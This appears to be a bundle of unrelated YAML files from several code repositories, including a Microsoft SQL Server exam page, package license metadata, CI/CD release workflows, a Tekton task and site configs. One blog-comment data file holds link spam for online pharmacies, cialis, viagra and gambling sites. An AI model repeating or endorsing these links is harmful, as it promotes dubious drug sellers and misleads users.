Questo esame è rivolto ai professionisti esperti in database che progettano e sviluppano soluzioni database all’interno dell'azienda. Sono responsabili della creazione di piani e progettazioni per la struttura del database, l'archiviazione, gli oggetti e i server. Creano il piano per l'ambiente in cui viene eseguita la soluzione database.
<div style='font-weight: bold;'><br/>Dal 18 febbraio 2016, questo esame include anche contenuti riferiti sia a SQL Server 2012 che SQL Server 2014. Si noti che questo esame non include domande su funzioni o funzionalità presenti solo in SQL Server 2012. Per ulteriori informazioni, si prega di <a href="https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4tLUO">scaricare e rivedere questo documento</a>.</div>
subTitle: Questo esame è rivolto ai professionisti esperti in database che progettano e sviluppano soluzioni database all’interno dell'azienda. Sono responsabili della creazione di piani e progettazioni per la struttura del database, l'archiviazione, gli oggetti e i server. Creano il piano per l'ambiente in cui viene eseguita la soluzione database.
iconUrl: /media/learn/certification/badges/certification-exam.svg
pdfDownloadUrl: https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4t560
locales:
- en
- zh-cn
- fr
- de
- ja
- pt-br
levels:
- advanced
skills:
- Progettare la struttura di un database (25-30%)
- Progettare database e oggetti database (30-35%)
- Progettare la sicurezza di un database (10-15%)
- Progettare una risoluzione dei problemi e ottimizzare la soluzione (25-30%)
retirementDate: 01/31/2021
roles:
- data-engineer
products:
- sql-server
courses:
- uid: course.20465
relatedCertifications:
- related:
uid: certification.mcse-data-management-analytics
resources:
- title: Exam Replay
description: Scopri due grandi offerte che ti aiutano a migliorare le tue probabilità di successo.
href: ../deals.md
- title: Dashboard delle certificazioni
description: Rivedi e gestisci gli appuntamenti programmati, i certificati e le trascrizioni.
href: https://www.microsoft.com/learning/dashboard.aspx
- title: Richiedere una sistemazione
description: Scopri come richiedere una sistemazione particolare per il tuo esame.
href: ../request-accommodations.md
- title: Criteri dell’esame e domande frequenti
description: Rivedi e gestisci gli appuntamenti programmati, i certificati e le trascrizioni.
href: ../certification-exam-policies.md
|
learn-certs-pr/exams/70-465.yml
|
---
name: amqp
version: 5.0.2
type: pipenv
summary: Low-level AMQP client for Python (fork of amqplib).
homepage: http://github.com/celery/py-amqp
license: other
licenses:
- sources: LICENSE
text: |
Copyright (c) 2015-2016 Ask Solem & contributors. All rights reserved.
Copyright (c) 2012-2014 GoPivotal, Inc. All rights reserved.
Copyright (c) 2009, 2010, 2011, 2012 Ask Solem, and individual contributors. All rights reserved.
Copyright (C) 2007-2008 <NAME> <<EMAIL>>. All rights reserved.
py-amqp is licensed under The BSD License (3 Clause, also known as
the new BSD license). The license is an OSI approved Open Source
license and is GPL-compatible(1).
The license text can also be found here:
http://www.opensource.org/licenses/BSD-3-Clause
License
=======
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Ask Solem, nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Ask Solem OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
Footnotes
=========
(1) A GPL-compatible license makes it possible to
combine Celery with other software that is released
under the GPL, it does not mean that we're distributing
Celery under the GPL license. The BSD license, unlike the GPL,
let you distribute a modified version without making your
changes open source.
notices: []
|
cache/Odaikun/pipenv/amqp.dep.yml
|
# <NAME> - Murmur
- name: coming-soon
title: Murmur
author: <NAME>
index: E
thumbnail: eaves-murmur.jpg
publisher: CB Editions
pub-date: 1st Mar., 2018
extents: 177pp.
teaser: ""
# all other book data (in reverse chronological order by post date NOT pub date)
# <NAME> - Outline
- name: cusk-outline
title: Outline
author: <NAME>
index: C
thumbnail: cusk-outline.jpg
publisher: Faber & Faber
pub-date: 3rd May, 2018
extents: 256pp.
teaser: >
“Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.
Est tempor ea sunt enim excepteur adipisicing magna.
Elit aliquip nostrud duis qui pariatur laboris amet.
Ea adipisicing nisi commodo sint elit nostrud.”
- name: cusk-transit
title: Transit
author: <NAME>
index: C
thumbnail:
publisher: Faber & Faber
pub-date:
extents:
teaser: >
“Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.
Est tempor ea sunt enim excepteur adipisicing magna.
Elit aliquip nostrud duis qui pariatur laboris amet.
Ea adipisicing nisi commodo sint elit nostrud.”
# Benjamin Black - Prague Nights
- name: black-prague-nights
title: Prague Nights
author: <NAME>
index: B
thumbnail: black-prague-nights.jpg
publisher: Viking
pub-date: 1st Jun., 2017
extents: 366pp.
teaser: >
“Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.”
# <NAME> - Train Dreams
- name: johnson-train-dreams
title: Train Dreams
author: <NAME>
index: J
thumbnail: johnson-train-dreams.jpg
publisher: Granta
pub-date: 4th Jul., 2013
extents: 128pp.
teaser: >
“Ex voluptate commodo veniam nulla id aliqua aliqua sunt sunt eu exercitation dolor cillum aliquip.
Labore amet elit proident labore do ipsum qui.
Lorem sint non dolore anim labore ipsum mollit ipsum aliquip magna anim laborum.
Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.”
# <NAME> - Everything Under
- name: johnson-everything-under
title: Everything Under
author: <NAME>
index: J
thumbnail: johnson-everything-under.jpg
publisher: Vintage
pub-date: 7th Feb., 2019
extents: 272pp.
teaser: >
“Aliquip cillum non nisi sunt.
Anim nostrud tempor do dolor sint excepteur ea Lorem proident duis aliqua ipsum magna in.
In eiusmod ullamco sint ipsum tempor sint tempor ea.
Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.”
# <NAME> - Waiting for the Bullet
- name: d'arcy-waiting-for-the-bullet
title: Waiting for the Bullet
author: <NAME>
index: A
thumbnail: d'arcy-waiting-for-the-bullet.jpg
publisher: Doire Press
pub-date: 26th Mar., 2014
extents: 152pp.
teaser: >
“Aute nisi veniam elit deserunt cillum culpa aliquip.
Ipsum Lorem culpa aute irure laborum elit.
Irure deserunt amet minim duis ullamco est non.
Dolor eiusmod cupidatat duis qui consectetur.
Mollit nulla consectetur id excepteur do.
Anim ut dolor quis sit consequat.
Mollit laboris proident sunt incididunt mollit consequat officia.
Ad deserunt eu veniam qui eiusmod ex proident pariatur tempor mollit laborum enim laboris elit.”
|
_data/book-data.yml
|
gitlab_urls:
api: https://git.tu-berlin.de/api/v4/
download: https://git.tu-berlin.de
builds:
-
id: "FReD"
main: ./cmd/frednode
binary: fred
env:
- CGO_ENABLED=0
goos:
- linux
goarch:
- amd64
- arm64
- id: "FReD Proxy"
main: ./cmd/fredproxy
binary: fredproxy
env:
- CGO_ENABLED=0
goos:
- linux
goarch:
- amd64
- arm64
- id: "ALExANDRA"
main: ./cmd/alexandra
binary: alexandra
env:
- CGO_ENABLED=0
goos:
- linux
goarch:
- amd64
- arm64
dockers:
-
ids:
- FReD
goos: linux
goarch: amd64
dockerfile: Dockerfile
image_templates:
- "git.tu-berlin.de:5000/mcc-fred/fred/fred:{{ .Tag }}"
- "git.tu-berlin.de:5000/mcc-fred/fred/fred:v{{ .Major }}"
- "git.tu-berlin.de:5000/mcc-fred/fred/fred:v{{ .Major }}.{{ .Minor }}"
- "git.tu-berlin.de:5000/mcc-fred/fred/fred:latest"
extra_files:
- pkg/
- cmd/
- proto/
- go.mod
- go.sum
- ids:
- FReD Proxy
goos: linux
goarch: amd64
dockerfile: proxy.Dockerfile
image_templates:
- "git.tu-berlin.de:5000/mcc-fred/fred/fredproxy:{{ .Tag }}"
- "git.tu-berlin.de:5000/mcc-fred/fred/fredproxy:v{{ .Major }}"
- "git.tu-berlin.de:5000/mcc-fred/fred/fredproxy:v{{ .Major }}.{{ .Minor }}"
- "git.tu-berlin.de:5000/mcc-fred/fred/fredproxy:latest"
extra_files:
- pkg/
- cmd/
- proto/
- go.mod
- go.sum
- ids:
- ALeXANDRA
goos: linux
goarch: amd64
dockerfile: alexandra.Dockerfile
image_templates:
- "git.tu-berlin.de:5000/mcc-fred/fred/alexandra:{{ .Tag }}"
- "git.tu-berlin.de:5000/mcc-fred/fred/alexandra:v{{ .Major }}"
- "git.tu-berlin.de:5000/mcc-fred/fred/alexandra:v{{ .Major }}.{{ .Minor }}"
- "git.tu-berlin.de:5000/mcc-fred/fred/alexandra:latest"
extra_files:
- pkg/
- cmd/
- proto/
- go.mod
- go.sum
|
.goreleaser.yml
|
name: release-n-deploy
on:
push:
tags:
- "v*.*" # Trigger on push with tags matching aversion, e.g.: v1.0, v0.1.5
jobs:
release:
name: Create Release
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v2
# We need the whole history so we can later generate the release notes from the commit logs
- name: Fetch all history for all tags and branches
run: git fetch --prune --unshallow
# Generate draft release notes by taking the commit logs between this release and the previous
- name: Generate draft release notes
id: release_notes
run: |
# Get the whole commit log with a pretty and easy to post-process format
notes="$(git log --pretty=format:' -%d%Creset %s' --abbrev-commit)"
# Get commit logs between this tag and the previous one
notes="$(awk '/tag: v/ { flag=!flag; count+=1; next } flag && count < 2 {print}' <<< "$notes")"
# Remove all merge commits for a cleaner log
notes="$(sed '/Merge pull request #/d' <<< "$notes")"
# Some weird string replacements to escape special characters...blame GitHub
# for this https://github.community/t5/GitHub-Actions/set-output-Truncates-Multiline-Strings/td-p/37870
notes="${notes//'%'/'%25'}"
notes="${notes//$'\n'/'%0A'}"
notes="${notes//$'\r'/'%0D'}"
echo "::set-output name=content::$notes"
- name: Create draft release
uses: actions/create-release@v1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:
tag_name: ${{ github.ref }}
release_name: Release ${{ github.ref }}
body: |
Release notes:
${{ steps.release_notes.outputs.content }}
draft: true
prerelease: false
deploy:
name: Deploy to PyPI
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v2
- name: Set up Python
uses: actions/setup-python@v1
with:
python-version: "3.x"
- name: Install dependencies
run: |
python -m pip install --upgrade pip
pip install setuptools wheel
- name: Build
run: python setup.py sdist bdist_wheel
- name: Publish package to PyPI
uses: pypa/gh-action-pypi-publish@v1.1.0
with:
user: __token__
password: ${{ secrets.pypi_password }}
|
.github/workflows/release_n_deploy.yml
|
name: Publish Docker Package
on:
push:
tags:
- 'v*'
jobs:
on-success:
needs: publish
runs-on: ubuntu-latest
if: ${{ always() && needs.publish.result == 'success' }}
steps:
- name: Notification Feishu
uses: whatwewant/action-robot-feishu@v0.0.13
with:
url: ${{ secrets.DOCKER_VERSION_FEISHU_BOT_WEBHOOK_URL }}
title: '✅ Docker 发布:${{ github.repository }}'
text: |
分支: ${{ github.ref }}
提交信息: ${{ github.event.head_commit.message }}
提交人: ${{ github.actor }}
状态: 构建成功(https://github.com/${{ github.repository }}/actions/runs/${{ github.run.id }})
on-failure:
needs: publish
runs-on: ubuntu-latest
if: ${{ always() && needs.publish.result == 'failure' }}
steps:
- name: Notification Feishu
uses: whatwewant/action-robot-feishu@v0.0.13
with:
url: ${{ secrets.DOCKER_VERSION_FEISHU_BOT_WEBHOOK_URL }}
title: '❌ Docker 发布:${{ github.repository }}'
text: |
分支: ${{ github.ref }}
提交信息: ${{ github.event.head_commit.message }}
提交人: ${{ github.actor }}
状态: 构建失败(https://github.com/${{ github.repository }}/actions/runs/${{ github.run.id }})
publish:
runs-on: ubuntu-latest
steps:
- name: Get Current Date
id: date
run: echo "::set-output name=date::$(date +'%Y-%m-%d')"
- uses: actions/checkout@v2
with:
fetch-depth: '0'
# - name: Docker meta
# id: meta
# uses: docker/metadata-action@v3
# with:
# # Custom Image: https://github.com/docker/metadata-action#inputs
# # images: whatwewant/zmicro,ghcr.io/whatwewant/zmicro
# images: whatwewant/zmicro
# tags: |
# type=ref,event=branch
# type=semver,pattern=v{{version}}
# type=semver,pattern=v{{major}}
# type=semver,pattern=v{{major}}.{{minor}}
- name: Docker Meta
id: meta
run: |
IMAGE_VERSION=$(echo ${GITHUB_REF} | sed -e "s%refs/tags/%%g")
IMAGE_NAME=${ACTION_IMAGE_NAMESPACE}/${ACTION_IMAGE_NAME}
IMAGE_TAGS=${IMAGE_NAME}:${IMAGE_VERSION}
echo "IMAGE_TAGS: ${IMAGE_TAGS}"
echo "::set-output name=version::${IMAGE_VERSION}"
echo "::set-output name=name::${IMAGE_NAME}"
echo "::set-output name=tags::${IMAGE_TAGS}"
shell: bash
env:
ACTION_IMAGE_NAMESPACE: whatwewant
ACTION_IMAGE_NAME: zmicro
- name: Show Docker Tags
run: |
echo "Docker Tags: ${{ steps.meta.outputs.tags }}"
- name: Set up QEMU
uses: docker/setup-qemu-action@v1
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@v1
- name: Login to DockerHub
if: github.event_name != 'pull_request'
uses: docker/login-action@v1
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
# - name: Login to GHCR
# if: github.event_name != 'pull_request'
# uses: docker/login-action@v1
# with:
# registry: ghcr.io
# username: ${{ github.repository_owner }}
# password: ${{ secrets.GITHUB_TOKEN }}
- name: Build and push
uses: docker/build-push-action@v2
with:
build-args: |
VERSION=${{ steps.meta.outputs.version }}
context: .
push: ${{ github.event_name != 'pull_request' }}
cache-from: type=registry,ref=${{ steps.meta.outputs.name }}:buildcache
cache-to: type=registry,ref=${{ steps.meta.outputs.name }}:buildcache,mode=max
tags: ${{ steps.meta.outputs.tags }}
labels: ${{ steps.meta.outputs.labels }}
platforms: linux/amd64,linux/arm64,linux/arm/v7
|
.github/workflows/publish.yml
|
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: gitlab-set-environment
labels:
app.kubernetes.io/version: "0.1"
annotations:
tekton.dev/pipelines.minVersion: "0.12.1"
tekton.dev/categories: Git
tekton.dev/tags: gitlab, git
tekton.dev/displayName: "Set Gitlab commit environment"
tekton.dev/platforms: "linux/amd64"
spec:
description: >-
This task creates or updates an environment within a gitlab project.
params:
- name: GITLAB_HOST_URL
description: |
The GitLab host, adjust this if you run a GitLab enterprise.
default: "https://gitlab.com"
type: string
- name: REPO_FULL_NAME
description: |
The GitLab repository full name, e.g.: codecentric/tekton-catalog
type: string
- name: GITLAB_TOKEN_SECRET_NAME
description: |
The name of the kubernetes secret that contains the GitLab token, default: gitlab-api-secret
type: string
default: gitlab-api-secret
- name: GITLAB_TOKEN_SECRET_KEY
description: |
The key within the kubernetes secret that contains the GitLab token, default: token
type: string
default: token
- name: ENVIRONMENT_NAME
description: |
Name of the environment
type: string
default: main
- name: ENVIRONMENT_URL
description: |
The target URL to associate with the environment.
type: string
default: https://codecentric.de
steps:
- name: set-environment
image: ghcr.io/marcopaga/tekton-task-gitlab-set-environment:f44b459
env:
- name: GITLAB_HOST_URL
value: $(params.GITLAB_HOST_URL)
- name: REPO_FULL_NAME
value: $(params.REPO_FULL_NAME)
- name: GITLAB_TOKEN
valueFrom:
secretKeyRef:
name: $(params.GITLAB_TOKEN_SECRET_NAME)
key: $(params.GITLAB_TOKEN_SECRET_KEY)
- name: ENVIRONMENT_NAME
value: $(params.ENVIRONMENT_NAME)
- name: ENVIRONMENT_URL
value: $(params.ENVIRONMENT_URL)
|
task/gitlab-set-environment/0.1/gitlab-set-environment.yaml
|
_id: 28e1ae30-2b23-11ea-b64a-9bced634a8a3
message: >-
Coronoid: sch.abtg.hashtafak.github.io.tda.dn myself successful creatinine,
[URL=http://casino-bonusgambling.space/]biggest gambling guide[/URL]
[URL=http://michiganvacantproperty.org/synthroid/]synthroid[/URL] synthroid
[URL=http://fbwhatsapquotes.com/canadian-pharmacy-online/]pharmacy[/URL]
[URL=http://casatheodoro.com/liv-52/]order liv.52 online[/URL]
[URL=http://oliveogrill.com/on-line-pharmacy/]canadian pharmacy cialis
20mg[/URL] [URL=http://trucknoww.com/cialis-edrugstore/]cialis
edrugstore[/URL] [URL=http://gormangreen.com/drug/cialis/]cialis[/URL]
[URL=http://center4family.com/www-viagra-com/]viagra[/URL]
[URL=http://oliveogrill.com/tadalafil/]cialis[/URL] antacids <a
href="http://casino-bonusgambling.space/">online gambling strategy</a>
gambling online rules <a
href="http://michiganvacantproperty.org/synthroid/">buy levothyroxine
online</a> <a
href="http://fbwhatsapquotes.com/canadian-pharmacy-online/">canadian pharmacy
online</a> pharmacy <a href="http://casatheodoro.com/liv-52/">order liv.52
online</a> <a href="http://oliveogrill.com/on-line-pharmacy/">canadian
pharmacy</a> <a href="http://trucknoww.com/cialis-edrugstore/">cialis 20mg
price at walmart</a> <a href="http://gormangreen.com/drug/cialis/">generic
cialis lowest price</a> <a
href="http://center4family.com/www-viagra-com/">viagra</a> <a
href="http://oliveogrill.com/tadalafil/">generic cialis canada</a> heater
procedure, http://casino-bonusgambling.space/ gambling online bonuses
http://michiganvacantproperty.org/synthroid/ levothyroxine
http://fbwhatsapquotes.com/canadian-pharmacy-online/ pharmacy
http://casatheodoro.com/liv-52/ liv.52 pills liv.52 pills
http://oliveogrill.com/on-line-pharmacy/ on line pharmacy
http://trucknoww.com/cialis-edrugstore/ cialis alternative
http://gormangreen.com/drug/cialis/ cialis
http://center4family.com/www-viagra-com/ viagra
http://oliveogrill.com/tadalafil/ order cialis photoreceptor fevers.
name: asubsetume
email: 4db91a86514a9a4573719ad584f04e6c
url: 'http://casino-bonusgambling.space/'
hidden: ''
date: '2019-12-30T16:41:00.235Z'
|
_data/comments/dear-diary/comment-1577724060236.yml
|
image: google/dart:latest
cache:
untracked: true
key: "$CI_BUILD_REF_NAME"
paths:
- packages/
- web/packages/
- .pub_cache/
stages:
- build
- test
- publish
before_script:
- export PUB_CACHE=$PWD/.pub_cache/
- pub version
- pub get
- pub upgrade
analyze:
stage: build
script:
- dartanalyzer lib example test
test:
stage: test
script:
- pub run test
- pub run test_coverage --min-coverage=90
tags:
- docker
#dry-run:
# stage: publish
# script:
# - pub get
# - pub publish --dry-run
# only:
# - master
pub-dev:
stage: publish
script:
- |
if [ -z "${PUB_DEV_PUBLISH_ACCESS_TOKEN}" ]; then
echo "Missing PUB_DEV_PUBLISH_ACCESS_TOKEN environment variable"
exit 1
fi
if [ -z "${PUB_DEV_PUBLISH_REFRESH_TOKEN}" ]; then
echo "Missing PUB_DEV_PUBLISH_REFRESH_TOKEN environment variable"
exit 1
fi
if [ -z "${PUB_DEV_PUBLISH_TOKEN_ENDPOINT}" ]; then
echo "Missing PUB_DEV_PUBLISH_TOKEN_ENDPOINT environment variable"
exit 1
fi
if [ -z "${PUB_DEV_PUBLISH_EXPIRATION}" ]; then
echo "Missing PUB_DEV_PUBLISH_EXPIRATION environment variable"
exit 1
fi
if [ ! -d "~/.pub-cache" ]; then
mkdir ~/.pub-cache
fi
cat <<EOF > .pub_cache/credentials.json
{
"accessToken":"$(echo "${PUB_DEV_PUBLISH_ACCESS_TOKEN}" | base64 -d)",
"refreshToken":"$(echo "${PUB_DEV_PUBLISH_REFRESH_TOKEN}" | base64 -d)",
"tokenEndpoint":"${PUB_DEV_PUBLISH_TOKEN_ENDPOINT}",
"scopes":["https://www.googleapis.com/auth/userinfo.email","openid"],
"expiration":${PUB_DEV_PUBLISH_EXPIRATION}
}
EOF
- pub get
- pub publish -f
only:
- master
#tag:
# image: docker:stable
# services:
# - docker:stable-dind
# stage: publish
# script:
# - |
# if [ -z "${GITLAB_API_TOKEN}" ]; then
# echo "Missing GITLAB_API_TOKEN environment variable"
# exit 1
# fi
#
# export TAG_NAME="$(awk '/^version: /{print $NF}' pubspec.yaml)"
# docker run --rm curlimages/curl --fail --request POST --header "PRIVATE-TOKEN: ${GITLAB_API_TOKEN}" \
# --data-urlencode "tag_name=v${TAG_NAME}" \
# --data-urlencode "ref=master" \
# --data-urlencode "release_description=Check the [CHANGELOG.md](/CHANGELOG.md)" \
# "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/repository/tags"
# environment:
# name: pub-dev
# url: https://pub.dev/packages/dart_inject
# only:
# - master
|
.gitlab-ci.yml
|
homepage: ''
changelog-type: markdown
hash: 4a12b0a9a161563a8475d87d8cf21367868a8a5bda62b6af6b9932707f94b4a8
test-bench-deps:
tasty-smallcheck: -any
base: ! '>=4.7 && <5'
tasty-discover: -any
setoid: -any
smallcheck: -any
containers: ! '>=0.5 && <0.6'
tasty-quickcheck: -any
mtl: -any
tasty-hunit: -any
tasty: -any
maintainer: <EMAIL>
synopsis: A Haskell implementation of setoid
changelog: ! '# Revision history for setoid
## 0.1.0.0 -- 2017-01-17
* Initial extract of Setoid into a standalone library
'
basic-deps:
base: ! '>=4.7 && <5'
containers: ! '>=0.5 && <0.6'
all-versions:
- 0.1.0.0
author: <NAME>
latest: 0.1.0.0
description-type: markdown
description: ! "# Setoid\n\nA Haskell implementation of [setoid](https://en.wikipedia.org/wiki/Setoid)
- a\nset equipped with an equivalence relation. Setoid is a useful data structure
in\ncases where equivalence is chosen not to be equality. One can use it to\ninfluence
the memberships of the elements more strictly, as opposed to sets, and\nrun computations
on unions when conflicts between elements are found.\n\nFor more in-depth explanations
and examples, please have a look at the\ndocumentation on hackage.\n\n### Copyright:\n*
[Global Access Internet Services GmbH](http://www.global.de)\n\n### Authors:\n*
[<NAME>](https://github.com/ptek)\n* [<NAME>](https://github.com/pzel)\n*
[<NAME>](https://github.com/irekjozwiak) - Author of the predecessor\n implementation
of sets wich stricter guarantees and the idea of Setoid in\n Haskell.\n\n## License\n\n```text\n
\ Copyright (c) 2017, Global Access Internet Services GmbH\n \n All rights
reserved.\n \n Redistribution and use in source and binary forms, with or
without\n modification, are permitted provided that the following conditions
are met:\n \n * Redistributions of source code must retain the above copyright
notice,\n this list of conditions and the following disclaimer.\n \n
\ * Redistributions in binary form must reproduce the above copyright\n notice,
this list of conditions and the following disclaimer in the\n documentation
and/or other materials provided with the distribution.\n \n * Neither
the name of Global Access Internet Services GmbH nor the names\n of other
contributors may be used to endorse or promote products\n derived from
this software without specific prior written permission.\n \n THIS SOFTWARE
IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS
OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n ARE DISCLAIMED. IN
NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE\n POSSIBILITY OF SUCH DAMAGE.\n```\n"
license-name: BSD-3-Clause
|
packages/se/setoid.yaml
|
name: testing
on:
pull_request:
push:
branches:
- main
jobs:
live-sandbox-cli:
runs-on: ubuntu-latest
steps:
- name: get a copy of the repo contents
uses: actions/checkout@v2
- name: install the project's dependencies
run: npm install
- name: generate a distributable tarball
run: npm run all
- name: install the cli from the tarball
run: sudo npm install -g zenodraft-*.tgz
- name: create a new directory to do the testing in
run: mkdir testing && cd testing
- name: test creating a new draft deposition in a new collection on zenodo sandbox
id: get_record_id
env:
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
RECORD_ID=$(zenodraft --sandbox deposition create in-new-collection)
echo "::set-output name=record_id::$RECORD_ID"
- name: test showing the complete details for the draft deposition
id: get_concept_record_id
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
zenodraft --sandbox deposition show details $RECORD_ID > deposition.json
CONCEPT_RECORD_ID=$(cat deposition.json | jq '.conceptrecid' --raw-output)
echo "::set-output name=concept_record_id::$CONCEPT_RECORD_ID"
- name: test showing the id of the latest draft in the newly created collection
env:
CONCEPT_RECORD_ID: ${{ steps.get_concept_record_id.outputs.concept_record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: zenodraft --sandbox deposition show latest $CONCEPT_RECORD_ID
- name: test showing the prereserved doi for the draft deposition
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: zenodraft --sandbox deposition show prereserved $RECORD_ID
- name: test adding a file to the draft deposition
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
echo "these are the file contents" > thefile.txt
zenodraft --sandbox file add $RECORD_ID thefile.txt
- name: test removing a file from the draft deposition
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
zenodraft --sandbox file delete $RECORD_ID thefile.txt
- name: test updating the deposition metadata with information from a local file
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
echo "{\"creators\":[{\"affiliation\":\"Netherlands eScience Center\",\"name\":\"<NAME>.\",\"orcid\":\"0000-0002-7064-4069\"}],\"description\":\"Auto-generated draft deposition for CI testing of zenodraft's CLI\",\"keywords\":[\"zenodo\",\"cli\"],\"license\":{\"id\":\"Apache-2.0\"},\"title\":\"Auto-generated deposition for testing purposes\"}" > .zenodo.json
zenodraft --sandbox metadata update $RECORD_ID .zenodo.json
- name: test clearing the deposition metadata
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: zenodraft --sandbox metadata clear $RECORD_ID
- name: test deleting a draft deposition
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: zenodraft --sandbox deposition delete $RECORD_ID
unit:
runs-on: ubuntu-latest
steps:
- name: get a copy of the repo contents
uses: actions/checkout@v2
- name: install the dependencies
run: npm install
- name: run the unit tests using jest and calculate coverage
run: npm run test
|
.github/workflows/testing.yml
|
# Site Settings
baseurl:
# It will redirect your site to this url
url : https://mrshen.github.io
title : Jzzz's Cosy Corner
name : mrshen's blog
subtitle : "If nothing goes right, go left."
description : "The personal blog of mrshen, learn to live, learn to love."
repository : mrshen/mrshen.github.io
keywords : mrshen, shenjiazhao, Jzzz's Cosy Corner, 沈佳照
date_format : "ordinal"
timezone : Asia/Shanghai
encoding : "utf-8"
side_bar_repo_limit : 3
author : mrshen
github_username : mrshen
location : Guangzhou, China
email : <EMAIL>
markdown : kramdown
kramdown:
input : GFM
syntax_highlighter_opts:
disable: true
# highlighter : rouge
paginate : 12
lsi : false
quiet : false
future : true
excerpt_separator : "\n\n" # 摘录的分隔符
permalink : /posts/:title.html # 博文发布的 URL,伪静态
plugins:
- jekyll-github-metadata # github 元信息
# - rouge # Jekyll 的语法高亮在 Jekyll 3.0 以上默认使用的是 Rouge
- jekyll-octicons # 支持 octions 图标
- jekyll-paginate # 分页
